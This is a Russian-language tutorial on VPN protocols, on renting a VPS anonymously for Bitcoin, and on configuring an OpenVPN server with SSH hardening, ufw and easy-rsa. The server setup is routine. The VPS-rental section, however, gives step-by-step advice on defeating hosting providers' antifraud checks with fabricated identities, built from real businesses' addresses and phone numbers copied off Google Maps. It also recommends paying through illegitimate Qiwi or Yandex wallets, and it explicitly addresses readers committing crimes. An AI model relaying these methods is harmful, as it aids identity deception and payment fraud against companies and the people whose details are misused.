IKEv2 — Тоже очень неплохой протокол с очень высокой степенью защиты, быстрый по скорости. Один из немногих протоколов, поддерживающий устройства Blackberry, но сам по себе поддерживает достаточно мало платформ. Этот протокол встретишь не так часто в VPN сервисах, в отличии от OpenVPN или L2TP. Исходный код не открыт, а это потенциально небезопасно.

PPTP — Этот протокол достаточно старый, один из самых первых. Быстрый по скорости и легкий в настройке, поддерживается почти всеми ОС, однако очень уязвимый и совершенно небезопасный. Несколько раз взламывался спецслужбами. Этот протокол использовать крайне не рекомендуется за исключением случаев, где вам не нужна защита. Это юзать не нужно ни в коем случае!

L2TP/IPsec — Уже лучше, чем PPTP. L2TP также поддерживается многими ОС, в том числе и мобильными и тоже достаточно прост в настройке. IPsec обеспечивает более стойкое шифрование, чем PPTP. Однако, L2TP/IPsec медленнее, чем PPTP или OpenVPN. Не обходит Фаерволлы.

SSTP — Протокол от Microsoft. SSTP с хорошим, стойким шифрованием, доступен только для операционных систем Windows. Как и OpenVPN, позволяет обходить Firewall. Проще в настройке, чем OpenVPN. Без открытого исходного кода, поэтому OpenVPN лучше.

Вывод: если есть возможность, использовать лучше только OpenVPN из-за открытого исходного кода, безопасности и относительной скорости. IKEv2 хороший протокол, безопасный, быстрый, стабильный, но с закрытым исходным кодом. L2TP/IPsec можно использовать вместо PPTP, а PPTP использовать вовсе не рекомендую. SSTP доступен только для Винды, тоже не очень рекомендую.

Бесплатные VPN vs свой VPN vs покупной VPN

Если вам нужен VPN срочно, быстро, здесь и сейчас и у вас нет оформленной подписки на каком-то VPN-сервисе, а своего сервера нет и подавно — тогда можете воспользоваться бесплатными VPN. Но затея, конечно, сомнительная.

Идем на сайты, скачиваем конфигурационный файл OpenVPN или получаем инструкцию по подключению, если вы используете другой VPN протокол.

Конфигурационный файл OpenVPN (с расширением .ovpn) нужно «скормить» вашему OpenVPN клиенту (о клиентах я написал ниже).

В чем преимущество бесплатных VPN?

Очевидно, что сама по себе бесплатность является плюсом. Также то, что такими серверами пользуются большое количество людей, прибавляет анонимности. На этом его преимущества заканчиваются.

Данные VPN очень нестабильные. Часто отваливаются. Очень медленные. Использовать их я бы рекомендовал, только если нужно срочно для чего-то и нет других возможностей. Но лучше что бы у вас не было таких ситуаций. Не исключено, что на таких серверах ведутся логи. Да и что на этих серверах ЕЩЕ происходит — никому не известно.

Для долгосрочного использования и по важным делам использовать крайне не рекомендую.

Можно воспользоваться собственным VPN. Нужно лишь купить сервер в интернете, зайти на него и поднять там OpenVPN по инструкции.

По сравнению с платными VPN-сервисами, свой собственный VPN выходит еще дешевле. Арендовать VPS (Virtual Private Server) можно чуть ли не за 2-3$/месяц в интернете. Что, по-моему, достаточно дешево — нужно лишь поискать.

Конечно же, свой VPN имеет и другие преимущества. Например, у вас будет root-доступ к серверу, поэтому вы можете отключить логирование и 100% быть уверенными в том, что логирование не ведется. В отличии от не своего VPN (бесплатные или платные), где у вас нет root-доступа, а это значит, что вы не можете никак быть уверенны в том, что логирование отключено, как бы вас не убеждали в этом эти сервисы. Вы сам себе хозяин на сервере. Это ваш VPN.

В отличии от бесплатных VPN, свой сервер будет работать гораздо быстрее и стабильнее. Это очень весомый плюс.

Также, поскольку у вас будет свой собственный сервер, туда можно прикрутить что-нибудь помимо OpenVPN, какой-нибудь другой сервис. Например, веб-сервер и разместить там небольшой сайт. Или можно сделать ее Tor-нодой, если провайдер разрешает. Tor relay разрешают чаще чем Tor Exit Node (выходную ноду).

Однако, существует проблема, что на сервере будете находиться вы и только вы один (если вы, конечно, не дадите использовать свой VPN еще пару сотен человек, но тогда и сервер нужен будет мощнее). Такой проблемы нет у бесплатных или платных VPN.

Еще одним минусом является то, что не каждый способен поднять себе VPN. Кто-то может плохо разбираться в IT и ему эти инструкции будут казаться совершенно дикими и непонятными. А кто-то будет совершенно не понимать что он делает вообще, это тоже не хорошо. В общем, настоятельно рекомендую использовать.

Можно воспользоваться услугами платных VPN сервисов которые тоже относительно недорогие (в среднем 5-12$/месяц).

Такие сервисы нужно искать, конечно же, в интернете. Большинство из них принимают к оплате Bitcoin, что несомненно круто. У многих есть свой OpenVPN клиент под какую-то операционную систему, но пользоваться их клиентами не очень рекомендуется из соображений безопасности.

Регистрируетесь и платите за месяц (или год, что выходит дешевле), скачиваете конфигурационный файл OpenVPN (.ovpn), скармливаете его вашему OpenVPN клиенту и всё, у вас будет VPN. Если у вас не OpenVPN, то читаете инструкцию на сайте сервиса по подключению с другим протоколом. Благо на этих сайтах у них хорошие инструкции и все предельной просто и понятно.

Из преимуществ можно выделить то, что каждый сервис предлагает сервера во многих разных странах, которые доступны вам. Между этими странами можно переключаться, вручную с .ovpn конфигами или как-то автоматически, если эта фича реализована в их клиенте. Тогда как на своем собственном сервере вы привязаны к одной стране, одному IP адресу. Не понравилась одна страна — переключились на другую.

Говорить про то, что эти сервера намного стабильнее, надежнее и быстрее по сравнению с «бесплатным» решением, я думаю не нужно. Доверие к платным сервисам тоже как-то больше, чем к бесплатным VPNам, хоть все равно нет гарантий.

По сравнению со своим собственным сервером, у вас нет root-доступа, посему контролировать процессы, которые происходят внутри вы не можете. Это значит, что никаких гарантий того, что логирование отключено, у вас нет.

Когда вы выбираете себе VPN сервис или VPS, обращайте внимание на то, где зарегистрирована фирма представляющая VPN, а также на то, в каких странах расположены их сервера. Про выбор VPS тоже самое.

Юридический момент в этом деле важен, но здесь я вам не помощник. Могу сказать лишь то, что использовать VPN расположенный в стране, где вы совершаете преступление, так себе затея. Так что, если вы работаете против России, заказывать сервера в этой стране или пользоваться услугами Российского VPN сервиса КРАЙНЕ нелогично.

Выбираете сервис или VPS — смотрите где расположены сервера, где зарегистрирован сервис или хостер, читайте политику конфиденциальности.

Лучшие VPN-сервисы в 2018 году:

Выбор редакции 2018

HideMyAss!

Наш рейтинг: 9

Прост и удобен в использовании с огромной серверной сетью и отличной поддержкой пользователей

ПОПРОБОВАТЬ

ЧИТАТЬ ОБЗОР

CyberGhost

Наш рейтинг: 9

Быстрый VPN-сервис с прекрасными функциями конфиденциальности

ПОПРОБОВАТЬ

ЧИТАТЬ ОБЗОР

Astrill

Наш рейтинг: 9

VPN, обеспечивающий конфиденциальность, предлагающий разнообразную серверную сеть и большие скорости

ПОПРОБОВАТЬ

ЧИТАТЬ ОБЗОР

Ищем и арендуем VPS за Bitcoin

Для того чтобы поднять собственный OpenVPN, нам неожиданно нужен свой сервер (далее VPS). Нужно купить VPS, зайти на него средствами SSH, произвести первичную настройку сервера (необязательно) и поднять OpenVPN.

Проблемы при анонимной покупке VPS

Многие зарубежные компании-хостеры принимают к оплате Bitcoin. Чего не скажешь о российских сервисах, предлагающих арендовать VPS. Хотя и среди Российских можно найти с оплатой данной криптовалютой.

Однако, даже с учетом того, что «белый» хостер принимает к оплате анонимную криптовалюту, многие из них все равно не любят анонимных клиентов. Поэтому при регистрации требуют ввести такие данные как ФИО, страна, город, адрес проживания, e-mail, мобильный телефон (не всегда). Также при регистрации и последующих заходах в личный кабинет логируется ваш IP адрес. Бывают более лояльные хостеры, бывают менее. Так что достаточно просто и анонимно купить VPS получится далеко не всегда.

Казалось бы, что при регистрации можно вбить левые данные, а проблема логирования IP решается проксями или Tor Браузером. НО НЕТ! Дело в том, что у многих таких «белых» хостеров на сайтах внедрены специальные антифрод системы, которые борются с мошенническими транзакциями. Вообще-то, это защита прежде всего от кардеров, но успешно работает и против чересчур анонимных клиентов.

Антифрод система рассчитывает риск мошеннической транзации или «странного» клиента на основе очень многих факторов, которые долго и бесполезно перечислять в рамках данной статьи. В вкратце расскажу о некоторых базовых факторах, которые стоит учитывать:

1) IP адрес. Он должен быть более-менее чистый и не быть в базе антифрод системы как прокся и прочее. Это важнейший фактор. Как вы понимаете, IP адрес Tor во всех списках, и если у хостера стоит самый хуевый антифрод и есть желание бороться с анонимными клиентами, то через Tor зарегистрироватьмч не получится.

Вы можете использовать хорошие прокси или VPN. В общем, разберетесь.

2) Человек должен соответствовать реальности. Вбивать в ФИО ‘ksdjfsjd skdfkk skdgs» примерно такое — не нужно.

3) Адрес должен быть тоже реальным. Не нужно писать улица ленина, в городе залупинс в Афганистане. Ок? Также, если у вас IP российский, значит и адрес тоже должен быть российским.

4) Желательно чтобы адрес соответствовал Zip Code (индексу). В смысле, он должен принадлежать ему.

5) Телефон. Должен иметь разный вид в зависимости от страны. Если Россия, то +7901… и дальше любые цифры. Зарубежные компании (это относится, кстати, не только к хостерам), очень редко присылают смс-код на номер телефона для подтверждения регистрации или чего-то еще, в отличии от российских компаний.

В общем, все должно быть максимально правдоподобно, будто заказывает реальный, нормальных, не анонимный клиент. Но даже эти меры в каких-то случаях могут не спасти, поскольку антифрод системы бывают разные и бывают настроены по-разному.

VPS с арендой за Bitcoin

Аренду VPS предлагает много хостеров. Нам не нужны большие мощности, поэтому подойдут самые слабые сервера с технологией виртуализации OpenVZ (но лучше KVM или Xen) с малой процессорной мощностью и небольшим количеством оперативной памяти (256-512 mb). Стоить такие сервера могут в среднем 2-5$ в месяц. А если постараться поискать, то можно найти и за 12-18$ за целый год.

Кстати, если вы нашли VPS, который не принимает к оплате Bitcoin или у вас просто их нет, зато есть Qiwi или Яндекс Деньги, то вы можете попытаться заплатить за сервер Виртуальной Кредитной Картой (VCC — Virtual Credit Card). Эти карты можно выпустить на сайте Qiwi и Яндекс Денег соответственно. При этом, естественно, Киви и ЯД должны быть левыми. Но лучше платите Биткоинами.

Для поднятия OpenVPN нам нужно чтобы наш VPS поддерживал TUN/TAP. Обычно почти все VPS провайдеры предоставляют эту фичу. Где-то она сразу включена, как только создается VPS, где-то приходится включать через панель управления на сайте (если OpenVZ), где-то нужно просить техническую поддержку что бы включили вам TUN/TAP (но это редко).

Что бы найти VPS, нужно ввести правильный запрос в гугле. Запросы лучше делать на англ. языке, чтобы выдавал зарубежных хостеров (если нужно). Запросы могут выглядить следующим образом: «buy vps», «buy cheap vps», «cheapest vps», «cheap openvz vps», «cheap vps <страна>» и подобное.

Также существуют различные сайты, на которых можно найти достаточно дешевые VPS.

Дешевые VPS

LowEndBox — сайт, на котором можете посмотреть дешевых VPS провайдеров.

LowEndTalk — этот сайт существует как дополнение к предыдущему. На нем много пользователей, идет активное обсуждение разных VPS провайдеров. Сайт этот очень полезный. На нем можно найти много мелких и не очень предпринимателей, которые подторговывают VPS. Также много полезной инфы, обзоров различных хостеров и прочее. Иногда сам почитываю.

LowEndStock — вот здесь представлены разные дешевые хостеры VPS в таблице.

VPS-List.Cryto — сайт, подобный предыдущему.

CompareVPS — еще один подобный сайт с таблицей, по-моему мнению, хуже LowEndStock.

PoiskVPS.ru — Российский сайт по подбору VPS. Подбирать можно по разым параметрам, например таким как страна размещения сервера или способ оплаты (можно отфильтровать за биткоин, киви или что вам удобно). Полезный сайт. В основном здесь российские хостеры. Цена на VPS начитается от 70 руб./месяц.

Crypto.net — а на этом сайте, по ссылке, автор собрал и переодически обновляет список VPS провайдеров, которые принимают к оплате Bitcoin. Раньше это было более актуально, но сейчас очень большое количество провайдеров принимают Bitcoin.

FreeVPS.us — данный сайт может быть тоже интересен. Можно встретить каких-то VPS провайдеров дешевых. Можно найти и бесплатных или с бесплатным пробным периодом — этому сайт и посвящен.

WebHostingTalk.comp — в дополнение. Большой форум с обсуждением провайдеров VPS/VDS, и хостингов.

На этих сайтах достаточно много информации по дешевым VPS. Заходите, читайте, находите.

Анонимно арендуем VPS за Bitcoin

И вот мы нашли VPS с поддержкой TUN/TAP, теперь нам нужно его арендовать. Я буду показывать аренду VPS в одном из перечисленных выше VPS провайдеров.

Мое соеденение на данным момент такое: на Хост. машине VPN + виртуалка Whonix. Поскольку я писал выше о проблемах аренды VPS через Tor, мне необходим на выходе белый (не Tor) IP.

Я иду на vpngate.net, нахожу там France в списке, скачиваю OpenVPN TCP конфиг (TCP, потому что этот VPN идет после Tor, а он только с TCP). Запускаю VPN на своем Linux (openvpn —config <конфиг.ovpn>).

Так как я выбрал France VPN, с французский IP, это значит что и мой «вирутальный клиент», тоже будет из Франции. И звать его будут никак не Вася Иванов, и жить он будет не в Красноярске.

Я захожу на сайт whoer.net для того чтобы убедиться, что IP действительно определяется из Франции. Там же была показана следующая информация: IP Фрнации, а также был указан город — Audincourt.

Вы можете тоже воспользоваться бесплатным VPN или хорошими проксями/SSH. В моем случае так получилось, что это Франция.

На сайте провайдера, я выбираю нужную мне услугу, в моем случае это VPS за 3$/месяц. Жму «Купить» или «Заказать» и меня перекидывает на страницу с конфигурацией сервера.

Так вводим какую-то информацию о сервере: Hostname, NS префиксы, пароль от root, выбираем операционную систему.

Hostname — вводим что угодно, например site.test

NS префиксы — тоже что угодно, например ns1.site.test, ns1.site.test

Пароль от root — вводим по безопаснее.

Выбираем ОС — выбирайте лучше Debian или Ubuntu (лучше Debian).

Лучше 64 бит. И самые последние доступные версии. Я выбрал Debian 8 x64. Если вы умеете работать с дистрибутивом, например CentOS, то выбирайте что душе угодно. Я все буду показывать на примере Debian.

Страница на этапе конфигурации может отличаться от провайдера к провайдеру. Поэтому не удивляйтесь, например, что вам не предложит ввести праоль от рута — значит они его сгенерируют самостоятельно и вышлют на почту.

После этого я жму Contune, затем Checkout и попадаю на страницу, где нужно вбивать данные о себе:

Имя, фамилия (придумываем сами, только не Вася Иванов)

Имейл (регаем по новой или юзаем если есть, лучше gmail, yahoo.com, hotmail, outlook, или еще что-то, У ВАС ДОЛЖЕН БЫТЬ ДОСТУП К НЕМУ)

Телефон

Адрес

Zip code

Страна (страну вы знаете по IP)

Область (раскрывающийся список из областей, на которую поделена страна)

Город (город может отображаться на том же whoer.net или других подобных сервисах, а может и не отображаться)

Пароль от аккаунта

Как сгенерировать эти данные? Ведь одно дело, когда у вас IP российский, а другое, когда другой страны, типа Франции. С Россией или Украиной в этом плане как-то проще, тут все понятно.

Для того чтобы подобрать адрес (регион страны, в котором расположен город, адрес, телефон, зип код) я воспользуют гугл картами.

А именно, я открываю Google Maps и вводжу в поиск название города, который у меня отобразился — Audincourt. Меня приблежвает к городу и карты подсвечивают его границы. Я приближаю еще немного сильнее карту и ищу какой-нибудь ОБЪЕКТ (кафе, школа, пиццерия, ресторан или еще что-то). Жму мышкой на этот объект и мне высвечивается инфорамция о нем, а именно:

Полный адрес и Zip Code, телефон (не всегда).

Для того чтобы определить область/штат/регион/провинцию, которой соответствует этот город — я просто гуглю название города и на 1-2 странице будет нужна информация.

Я копирую всю информацию и немного изменяю ее. Например, я меняю номер дома у адреса и, возможно, последние пару цифр в телефоне. Имя-фамилию я придумываю, имейл регаю или использую существующий, желательно, конечно, не Яндекс и не Майл ру. При этом, к почте у вас должен быть доступ, поскольку туда письмом придет необходимая информация. Смотрите скриншот.

Выбираю оплату Bitcoin, соглашаюсь с их правилами и жму Checkout или подобнуюю кнопку. На этом этапе начинает работать антифрод система, которая на основе факторов выше (IP, браузер, введенная информация) вычисляет так называемый Risk Score или Fraud Score, и определяет, можно тебе дальше или нельзя.

В моем случае все прошло гладко (обычно так и бывает) и меня перекинуло на страницу с информацией для оплаты bitcoin.

Там будет: число биткоинов к оплате + кошелек, куда платить. Помимо этого, этот Payment gateway (платежный шлюз) Coinfy позволяет платить не только Bitcoin но и другими криптовалютами. На все про все у вас 15 минут (без подтверждений, биткоин нужно лишь отправить). — Идем в ваш биткоин кошелек, копирует кошелек к оплате, копируем сколько битков переводить и переводим. После этого почти моментально страница с инф. к оплате изменит свой вид. — Типа, все нормально, битки идут, и перекинет вас обратно на сайт, на так называемую страницу Order Confirmation.

Еще Order Confirmation вам упадет на имейл. Помимо этого, может упасть на имейл «подтверждалка» — письмо с ссылком, при переходе по которой, вы подтверждаете свой email. Так что проверяйте.

Начался процесс создания сервера. Длится он обычно не долго. Может минут 15, может час. Ну максимум 2. Если в течении этого времени сервер не создался, то пишите в тех.поддержку, создавая тикет.

Когда VPS создатстся, вам на имейл придет письмо со всей необходимой информацией для коннета на SSH: IP адрес VPS, пароль от root.

Или эта информация будет у вас в личной кабинете на сайте. Или часть там, часть на имейл.

Также, не везде и не всегда, провайдер предоставляет доступ к VPS Contol Panel. В моем случае он предоставляет. В письме есть инфа для логина.

Заходим на сервер по SSH

После того, как все данные для подключения были высланы вам на почту или вы нашли их в личном кабинете, то для коннекта к серверу вы обладаете всеми данными, а именно:

IP адресс.

Логин: root.

Пароль от root: либо вы указывали при создании сервера, либо был сгенерирован.

Для того чтобы подключиться по SSH на Windows, нужно воспользоваться сторонними программами. Скачивайте на выбор: Putty или Kitty. Работать с этими программами достаточно просто.

На ОС Linux и MacOS все проще.

В терминале вводим:

ssh user@ip

где: ip — IP адрес VPS.

user — username пользователя. При первом подключении / в нашем случае — root.

После нажатия enter, при самом первом коннекте, вам выскочит сообщение:

Are you sure you want to continue connecting (yes/no)?

вручную вводим yes, потом вам предложит ввести пароль от root, который у вас также есть. Если все хорошо, то вы подключились к VPS и вам будет передано управление командной строкой.

Скопировать и вставить в терминале можно так:

Если Linux, то ctrl+shift+v вставить в терминале (ctrl+shift+c скопировать из терминала).

Если Windows и вы используете Putty/Kitty, то вставить в консоль можно по нажатию на ПКМ.

Такое бывает, но иногда дистрибутив созданного сервера не совпадает с тем, который вы выбирали, когда делали заказ. Поэтому, если вы зашли на сервер по SSH и ввели команду

apt-get update

Ставим нужные пакеты:

apt-get install -y nano sudo htop curl perl python wget git openvpn openssl easy-rsa iptables ca-certificates ufw

где:

nano — консольный редактор. Обычно стоит изначально, но не всегда. htop — консольный диспетчер задач. openvpn — пакет openvpn. Нужно для поднятия OpenVPN. easy-rsa — скрипты для легкой генерации ключей. Нужно для поднятия OpenVPN. git — понадобится, если будете поднимать OpenVPN скриптом (далее в статье).

Еще можно поставить следующие пакеты, но не обязательно:

apt-get install build-essential make automake autoconf pkg-config

Далее, нам нужно создать пользователя:

useradd -m -s /bin/bash pp-ruloh

где:

useradd — команда, создающая пользователя.

-m — создает домашнюю папку пользователя (по пути /home/<имя пользователя>/), по-умолчанию имеет такое же название, как и имя пользователя

-s — указывает, какой shell использовать

pp-ruloh — имя пользователя.

После создания юзера, вам ОБЯЗАТЕЛЬНО нужно создать ему пароль, потому что мы будем использовать этого юзера для коннекта по ssh, поэтому вводим команду:

passwd pp-ruloh

Предложит дважды ввести пароль. При вводе не будет отображаться. Как вставлять в терминале я писал вышел.

Далее, нужно отключить лишние сервисы. Вводим команду:

netstat -tulpn

Для того что бы посмотреть, какие сервисы запущены. На данном этапе в идеале должен быть запущен только sshd. Поскольку у меня установлена Debian-minimal, то у меня так и есть и команда

netstat -tulpn

Выдает:

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp               0.0.0.0:22              0.0.0.0:*               LISTEN      204/sshd        
tcp6              :::22                   :::*                    LISTEN      204/sshd

Но обычно может быть запущен какой-нибудь веб-сервер, mail-server, еще что-то… Не знаю, что запущено у вас, поэтому по-очереди вводите следующие команды:

/etc/init.d/apache2 stop 
update-rc.d apache2 disable 
/etc/init.d/postfix stop 
update-rc.d postfix disable 
/etc/init.d/nginx stop 
update-rc.d nginx disable 
/etc/init.d/exim4 stop 
update-rc.d exim4 disable 
/etc/init.d/rpcbind stop 
update-rc.d rpcbind disable 
/etc/init.d/nfs-common stop 
update-rc.d nfs-common disable 
/etc/init.d/rsyslog stop 
update-rc.d rsyslog disable

Это должно отключить то, что обычно запущено уже при создании сервера.

Далее, можно настроить sshd. Из соображений безопасности поменяем порт со стандартного на нестандартный и запретим коннект от root.

Редактируем файл /etc/ssh/sshd_config при помощи nano:

nano /etc/ssh/sshd_config
systemctl restart sshd

или

service sshd restart

Изменения применятся.

Следующий ваш коннект по SSH будет выглядить следующим образом:

ssh -p 1488 user@ip

где:

-p 1488 — порт SSH, который вы указывали в /etc/ssh/sshd_config user — пользователь, отличный от root. Под рутом не получится подключиться.

Если у вас винда, то в PUTTY/KITTY тоже меняете порт. Теперь вы будете коннектиться по SSH на сервер через этого юзера. У него нет почти никаких прав, он даже не суперпользователь. Поэтому, для того чтобы производить какие-то манипуляции на сервера, нужно залогиниться под рутом. Для этого под обычным юзером вводим:

su -

И вводим пароль от root. Все — можете делать что хотите. Чтобы выйти из-под рута, вводите exit.

Поднимаем OpenVPN вручную

Итак, собственно, поднимаем OpenVPN-server.

Начнем с установки каких-то пакетов. Некоторые из них вы уже могли ставить, если производили первичную настройку из раздела выше.

Обновим систему:

apt-get update &amp;&amp; apt-get dist-upgrade -y
apt-get install -y sudo nano htop curl perl python wget git openssl ca-certificates iptables

И три основных пакета:

apt-get install -y openvpn easy-rsa ufw

После установки пакетов, разархивируем пример конфигурационного файла в папку /etc/openvpn/:

gunzip -c /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz &gt; /etc/openvpn/server.conf

Файл /etc/openvpn/server.conf — основной серверный конфигурационный файл OpenVPN.

Теперь немного отредактируем его:

nano /etc/openvpn/server.conf

Файл длиный, с большим количесвом комментариев (все, что идет в строчке после символа # — комментарий). Строки, которые начинаются с символа ; в данном файле — тоже комментарии.

Частичный разбор конфига будет ниже в статье.

Редактируем. В самом верху сразу будет port:

port 1194

Я поменяю порт на какой-нибудь совсем не стандартный:

port 16122

(Диапазон от 0 до 65000), я выбрал рандомно. Не займите порт, который слушает другой сервис, например в моем случае sshd случает 1488.

Идем дальше. Выбираем протокол — пара строк ниже:

proto udp

И видим, что она никак не закоментированная. Потому что по-умолчанию OpenVPN будет работать по UDP. Если вам нужен TCP, выше есть строчка proto tcp — раскоментируйте ее, удалите символ ; в нчале строки, а proto udp закоментируйте, добавив символ #. Оба нельзя, или то или другое. Я буду показывать на примере UDP, поэтому оставляю как есть.

Опускаемся ниже в конфиге и находим строку:

dh dh1024.pem

Меняем на dh2048.pem:

dh dh2048.pem

Идем ниже и находим закоментированную строку:

;push "redirect-gateway def1 bypass-dhcp"

Раскоментируем:

push "redirect-gateway def1 bypass-dhcp"

Еще чуть ниже находим две раскоментированные строки рядом:

push "dhcp-option DNS 208.67.222.222"
push "dhcp-option DNS 208.67.220.220"

Это то, какой DNS будет использоваться. По-умолчанию прописаны сервера OpenDNS, но можем прописать публичные сервера Google:

push "dhcp-option DNS 8.8.8.8"
push "dhcp-option DNS 8.8.4.4"

Можете оставить и OpenDNS.

Идем дальше и натыкаемся на строку

;tls-auth ta.key  # This file is secret

Просто раскоментируем:

tls-auth ta.key  # This file is secret

Листаем ниже и находим строку:

;cipher AES-128-CBC   # AES

Это шифрование. Раскоментируем строку и переделаем на AES-256-CBC:

cipher AES-256-CBC

Еще чуть ниже в файле находим две закоментированные строки:

;user nobody
;group nogroup

Раскоментим их:

user nobody
group nogroup

Далее, ниже находим строку, которая начинается со слова status и переделываем ее в следующий вид:

#status /dev/null 2&gt;&amp;1

Закоментированная.

Еще чуть ниже, находим строку, которая начинается со слова log, и придаем ей такой вид:

log /dev/null 2&gt;&amp;1

Не закоментированная. Это логи. Отключить логирование OpenVPN нельзя в привычном понимании, поскольку если закоментировать строку, то по-умолчанию будет писаться в syslog файл (/var/log/syslog).

Строку

;log-append

не трогаем

Еще чуть ниже, verb 3 меняем на:

verb

Сохраняем, закрываем. Мы еще вернемся к этому файлу позже.

Теперь включаем перенаправление пакетов, вводим команду:

echo 1 &gt; /proc/sys/net/ipv4/ip_forward

Затем:

cat /proc/sys/net/ipv4/ip_forward

Если возвращает единицу, значит все ОК.

Теперь надо чтобы изменения были и при перезагрузке сервера, поэтому редактирум файл /etc/sysctl.conf:

nano /etc/sysctl.conf

Ищем строку:

#net.ipv4.ip_forward=1

Раскоментируем ее:

net.ipv4.ip_forward=1

Если такой строки в файле нет вообще, добавьте вручную.

Настроим Firewall

Ранее мы установили пакет ufw. Теперь нам нужно добавить некоторые правила. Во-первых, нам нужно дать разрешить траффик на SSH. Я ввожу:

ufw allow 1488

Поскольку у меня sshd слушает порт 1488, если вы не меняли и у вас sshd слушает 22 порт, то вводите:

ufw allow ssh

Далее, нам нужно разрешить траффик на порт, который будет слушать OpenVPN, в моем случае это port 16122, потому что я менял его в конфиг. файле (выше):

ufw allow 16122/udp

Поскольку OpenVPN будет слушать UDP порт, я в конце добавил /udp. Если у вас OpenVPN настроен не на UDP, а на TCP, без слеша на конце (или /tcp).

Если вы ничего не меняли в конфиге, то у вас слушает порт 1194 UDP, а значит:

ufw allow 1194/udp

Теперь нужно изменить Forward Policy, редактируем файл /etc/default/ufw:

nano /etc/default/ufw

Ищем строку:

DEFAULT_FORWARD_POLICY="DROP"

И меняем ее значение на:

DEFAULT_FORWARD_POLICY="ACCEPT"

Теперь нам нужно разобраться с сетевыми интерфейсами, вводим команду:

ip addr

Команда выведет ваши интерфейсы. Там будет интерфейс lo и еще какой-нибудь, например eth0 или venet0. В моем случае интерфейс называется venet0 (ибо OpenVZ). У меня такой вывод:

1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
2: venet0: &lt;BROADCAST,POINTOPOINT,NOARP,UP,LOWER_UP&gt; mtu 1500 qdisc noqueue state UNKNOWN 
    link/void 
    inet 127.0.0.2/32 scope host venet0
    inet МОЙ IP/32 brd МОЙ IP scope global venet0:

Вам нужен интерфейс, который показывает ваш внешний IP. Из кода выше понятно, что venet0 показывает внешний IP. (inet МОЙ IP)

Далее, что нужно редактировать файл /etc/ufw/before.rules:

nano /etc/ufw/before.rules

И куда-нибудь наверх, вставляем следующее:

# START
*nat
:POSTROUTING ACCEPT [:]
-A POSTROUTING -s 10.8.0.0/8 -o &lt;ВАШ ИНТЕРФЕЙС&gt; -j MASQUERADE
COMMIT
# END

где вместо <ВАШ ИНТЕРФЕЙС> пишем интерфейс, в моем случае это venet0 и получилось так:

# START
*nat
:POSTROUTING ACCEPT [:]
-A POSTROUTING -s 10.8.0.0/8 -o venet0 -j MASQUERADE
COMMIT
# END

После всего этого включаем ufw:

ufw enable

Cмотрим на наши правила:

ufw status

Выводом покажет правила, которые вы создавали выше, у меня так:

root@ppVPS:~# ufw status
Status: active

To                  Action      From
--                  ------      ----
1488                ALLOW       Anywhere
16122/udp           ALLOW       Anywhere
1488                ALLOW       Anywhere (v6)
16122/udp           ALLOW       Anywhere (v6)

где 1488 — для SSH и 16122 — UDP опенвпн.

Отключить ufw можно так:

ufw disable

Генерируем ключи для сервера. Ранее мы ставили пакет easy-rsa. Теперь копируем папку со скриптами easy-rsa в папку openvpn:

cp -r /usr/share/easy-rsa/ /etc/openvpn

внутри папки easy-rsa создаем папку keys:

mkdir /etc/openvpn/easy-rsa/keys

Теперь сгенерируем Diffie-Hellman длиной 2048 и поместим его в /etc/openvpn:

openssl dhparam -out /etc/openvpn/dh2048.pem 2048

Еще сгенерируем файл ta.key в папку /etc/openvpn, для tls-auth:

openvpn --genkey --secret /etc/openvpn/ta.key

Далее…

Переходим в папку easy-rsa:

cd /etc/openvpn/easy-rsa

Тут лежит файл vars с какими-то переменными, редактируем его:

nano vars

Крутим вниз пока не наткнемся на блок:

export KEY_COUNTRY="US"
export KEY_PROVINCE="CA"
export KEY_CITY="SanFrancisco"
export KEY_ORG="Fort-Funston"
export KEY_EMAIL="me@myhost.mydomain"
export KEY_OU="MyOrganizationalUnit"

# X509 Subject Field
export KEY_NAME="EasyRSA"

В первых 6 строках можете менять значения, можете оставить как есть. Я оставлю как есть. Пофиг. Главное нельзя оставлять их пустыми.

Но конкретно здесь нас интересует строка

export KEY_NAME="EasyRSA"

Здесь значение меняем на server, что бы было вот так:

export KEY_NAME="server"

Можно поменять на любое другое, но не ебем мозг и меняем как я, потому что иначе вам придется менять значения в server.conf.

Если дали название отличное от server — запомните его.

Вот так. Сохраняем, закрываем файл.

Далее вводим следующее:

source vars

Далее, вводим:

./clean-all &amp;&amp; ./build-ca

Будет предлогать вводить какие-то значения, но мы их меняли (или не меняли) в файле vars. Просто везде жмем Enter и все. При этом, дойдя до пункта Name, нажимая Enter будет то имя, которое вы указывали ранее в KEY_NAME у меня это server.

Следующим делом вводим:

./build-key-server &lt;ИМЯ В KEY_NAME&gt;

где: <ИМЯ В KEY_NAME> — это то имя, которое вы давали в файле vars. Если ничего не давали, то по-умолчанию там было Easy-RSA. Я давал имя server, поэтому:

./build-key-server server

Точно таким же образом, везде жмем Enter. Даже там, где предложит ввести ‘A challenge password’, жмем enter.

Потом дважды вводим символ y, где попросит:

Sign the certificate? [y/n]:y 1 out of 1 certificate requests certified, commit? [y/n]y

В конце вы увидите:

Write out database with 1 new entries Data Base Updated

Теперь нам нужно переместить все сгенерированные ключи и сертификаты в папку /etc/openvpn.

Всё добро находится в папке /etc/oepnvpn/easy-rsa/keys. Нас интересуют 3 файла (исплючая dh2048.pem и ta.key, которые мы сгенерировали ранее) — ca.crt, server.crt, server.key,

где файлы server.crt и server.key — имеют название, которое вы указывали в KEY_NAME, я указывал server, помним да.

Перемещаем их следующим образом:

cp /etc/openvpn/easy-rsa/keys/{ca.crt,server.crt,server.key} /etc/openvpn/

Идем обратно в папку openvpn:

cd /etc/openvpn

Вводим к консоли ls и смотрим, какие файлы лежат. На данный момент должны быть следующие файлы: ca.crt, dh2048.pem (который мы генерировали ранее), server.conf (основной конфиг), server.crt, server.key и ta.key Еще может быть файл update-resolv-conf.

root@ppVPS:/etc/openvpn# ls
ca.crt	dh2048.pem  easy-rsa  server.conf  server.crt  server.key  update-resolv-conf

Теперь запускаем openvpn:

systemctl start openvpn

или

/etc/init.d/openvpn start

Проверяем, запустился ли:

systemctl status openvpn

или

/etc/init.d/openvpn status

Должно гореть зелененьким (лол), вы увидите надпись:

Active: active (exited) since

Проверяем, слушает ли порт:

netstat -tulpn | grep vpn

Должно вывести один сервис, который слушает на порту, который вы указывали.

